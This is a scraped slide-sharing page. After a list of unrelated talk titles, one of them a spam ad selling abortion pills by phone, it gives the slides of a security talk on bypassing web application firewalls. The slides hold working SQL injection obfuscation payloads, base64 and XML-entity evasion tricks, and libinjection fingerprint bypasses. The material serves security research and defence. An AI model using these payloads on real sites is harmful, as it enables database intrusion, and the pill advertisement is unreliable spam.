A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdf
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 

Lie to Me: Bypassing Modern Web Application Firewalls

  • 1. bypassing modern web application firewalls @ONsec_lab, http://lab.onsec.ru
  • 2. About • Security audits of webapps since 2009 • @d0znpp twitter • @ONsec_lab twitter • Nice blog! http://lab.onsec.ru - [ENG] • d0znpp[at]ONsec[dot]ru еmаi1
  • 3. WTF WAF? • Web Application Firewall • Prevent attacks • Attack !=Vulnerability • Risk != Attack
  • 4. SoftwareVS Hardware • Different HTTP parsers • Many «hardware» WAFs used Apache, Lighttpd, Nginx forks
  • 5. Implementation • Failover bypass: • DoS/DDoS WAF for bypass it- why not?! • What happens with traffic when your filter is overloaded? • XML, regexp, token bombs for this • Not so silently, right? :)
  • 6. WAF work stages • Parse HTTP packet from client (web server to this in general case) • Determine rules that must be applied to current URL/client/hostname/etc • Normalize data (2-nd urldecode, base64, etc) • Do detection logic (such as regexpr) • Make detection decision (true/false/score)
  • 7. WAF work stages • Parse HTTP packet from client (web server to this in general case) • Determine rules that must be applied to current URL/client/hostname/etc • Normalize data (2-nd urldecode, base64, etc) • Do detection logic (such as regexpr) • Make detection decision (true/false/score)
  • 9. Parse HTTP packets • First read: «Protocol-Level Evasion of Web Application Firewalls», Ivan Ristic, BH- US-2012 • Nice yesterday bypass Imperva by @webpentest during PHDays WAF bypass contest: Content-Type: invalid :))) • Classic example - HTTP Parameter Pollution • Are you sure that WAF’s and webapp’s HTTP protocols are the same?
  • 10. WAF work stages • Parse HTTP packet from client (web server to this in general case) • Determine rules that must be applied to current URL/client/hostname/etc • Normalize data (2-nd urldecode, base64, etc) • Do detection logic (such as regexpr) • Make detection decision (true/false/score)
  • 11. Data normalization level bug looks like tunnel
  • 12. Data normalization • Format parsers, for example: • base64 • xml • JSON • Are you sure that WAF’s and webapp’s parsers are the same?
  • 13. Data normalization • mod_security, t:base64decode • decode string until first = char • PHP, base64_decode($strict=false) • decode whole string • Attack vector • YWFh=attackhere • Use t:base64DecodeExt!
  • 14. Data normalization • Yet another example from yesterday PHDays WAF bypass contest - Imperva XML decoding • First decode XML, that validate attacks • XML input was not set up as XML type in WAF • Put attack as XML-encoded data (entities) to bypass regexpr: &#x75;nion select 123
  • 15. WAF work stages • Parse HTTP packet from client (web server to this in general case) • Determine rules that must be applied to current URL/client/hostname/etc • Normalize data (2-nd urldecode, base64, etc) • Do detection logic (such as regexpr) • Make detection decision (true/false/score)
  • 17. Detection logic • Regular expressions (mod_security, etc) • Tokenizers (libinjection) • ...
  • 18. SQL syntax • First read this works: • http://websec.wordpress.com/tag/sql- obfuscation/ • http://www.slideshare.net/nickgsuperstar/ new-techniques-in-sql-obfuscation • Obfuscated vector is more than welcome! • Try to exploit
  • 19. SQL syntax - time to fuzzing! • SELECT{$P1} 1 FROM... • ...UNION{$P2}FROM... • SELECT VERSION{$P3}() • SELECT{$P4}VERSION{P4}() • SELECT 1{P5}BAD
  • 20. MySQL: the classics • SELECT{U} 1 FROM • ...UNION{U}FROM... • SELECT VERSION{U}() • {U} = [0x09,0x0A-0x0D,0x20,0xA0]* • Fuzzed only 1-bytes sequences, not /**/, etc
  • 21. MySQL: time to fuzzing! • SELECT{F}VERSION{F}() • SELECT 1{D}BAD • {F} = {U} + 0x60 (backquote `) • {D} = # + 0x60 • Have a fun with regexp: • select`version` ( ) • ... where id=’1’`’ and ... - commented now
  • 22. MySQL: break tokens! • SELECT{O}1 FROM test • {O} = [-+!~@] • SELECT 1{W}FROM test; • {W} = [.d?|ed] • Part of this discovered during our WAF bypass contest last year by @Black2Fan
  • 23. MySQL: break tokens! • SELECT-1e1FROM test • SELECT~1.FROM test • SELECTNFROM test • SELECT@^1.FROM test • SELECT-id-1.FROM test • all tested on MySQL 5.1.66-0-squeeze1
  • 24. Postgres: the classics • SELECT{U} 1 FROM • ...UNION{U}FROM... • SELECT VERSION{U}() • {U} = [0x09,0x0A,0x0C,0x0D,0x20]* • Fuzzed only 1-bytes sequences, not /**/, etc
  • 25. Postgres: time to fuzz! • SELECT{F}VERSION{F}() • SELECT 1{D}BAD • {F} = {U} + 0x22 (doblequote ‘’) • {D} = # + 0x22 • Have a fun with regexp: • select’’version’’ ( ) • ... where id=’1’`’ and ... - commented now
  • 26. Postgres: break tokens! • SELECT{O}1 FROM test • {O} = [.-+!~@] - @ is absolute operator • SELECT 1{W}FROM test; • {W} = [.d?|ed|] - nothing is also OK!
  • 27. Postgres: break tokens! • SELECT-1ROM test • SELECT.1FROM test • SELECT~1FROM test • SELECT-id-1FROM test • SELECT-id-1FROM test • all tested on PostgreSQL 9.2.4
  • 28. Time to exploit! • mod_security • libinjection • others?
  • 30. mod_security • ?id=select id from test • ?id=select-id-1.from test Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:unions*?(?:all| d i s t i n c t | [ ( ! @ ] * ? ) ? s * ? [ ( [ ] * ? s * ? s e l e c t s + ) | ( ? : w + s + l i ke s + [ " ' ` xc2xb4xe2x80x99xe2x80x98])|(?:likes*?["'`xc2xb4xe2x80x99xe2x80x98]%)| (?:["'`xc2xb4xe2x80x99xe2x80x98]s*?likeW*?["'`xc2xb4 ..." at ARGS:id. [file "/ opt/modsecurity/rules/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: select id from found within ARGS:id: select id from test"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"]
  • 31. mod_security • ?id=1 or 1=1 or • ?id=1 or true or Message: Access denied with code 403 (phase 2). Pattern match "(?i:([s'"` x c 2 x b 4 x e 2 x 8 0 x 9 9 x e 2 x 8 0 x 9 8 ( ) ] * ? ) ( [ d w ] + + ) ( [ s ' " ` xc2xb4xe2x80x99xe2x80x98()]*?)(?:(?:=|<=>|r?like|soundss+like|regexp)([s'"` xc2xb4xe2x80x99xe2x80x98()]*?)2|(?:!=|<=|>=|<>|<|>|^|iss+not|not ..." at A R G S : i d . [ fi l e " / o p t / m o d s e c u r i t y / r u l e s / b a s e _ r u l e s / modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1=1 found within ARGS:id: 1 or 1=1 or "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.7"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/ WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/ 6.5.2"]
  • 32. libinjection • Token based detection • No more regexp! • Fingerprint for each attack 1-5 tokens sequence • 14 token types, 14^5+14^4+14^3+14^2+14 ~= 580k possible fingerprints • Is it enough to block all SQLi?
  • 33. libinjection • Bytes obfuscation doesn’t works now • But... • What happens if you missed some tokens?
  • 34. Attack #1. Missed token / fingerprint • As fuzzed above ` 0x60 byte can be used as a comment in MySQL and also as function quotes • ' into outfile 'asd' -- • block - skksc • ' into outfile 'asd' ` • bypass - skksn
  • 35. Attack #2.Token obfuscation • Find any unblocked fingerprint • Obfuscate your attack to produce the same fingerprint • Fingerprint have only 5 tokens • Need to exploit anti-obfuscation logic (1+1 and others hardcoded token combinations)
  • 36. Attack #2.Token obfuscation • Fingerprint «v1111» looks like safe • @a1a2a3a4 - variable but fingerprint of this string is «v», no numeric token here • @ф1й2у3ц4 - is valid variable for MySQL, but produce fingerprint «v1111» • @ф1й2у3ц4 union select ... produce fingerprint «v1111» also :)
  • 37. Some stats • Hacking WAFs since 2009 • About 50 different implementations • About 10 different engines • Time to hack: • min: 3 min • max: 19 hours • average: 1hour
  • 38. Questions? • @d0znpp twitter • @ONsec_lab twitter • Nice blog! http://lab.onsec.ru - [ENG] • d0znpp[at]ONsec[dot]ru еmаi1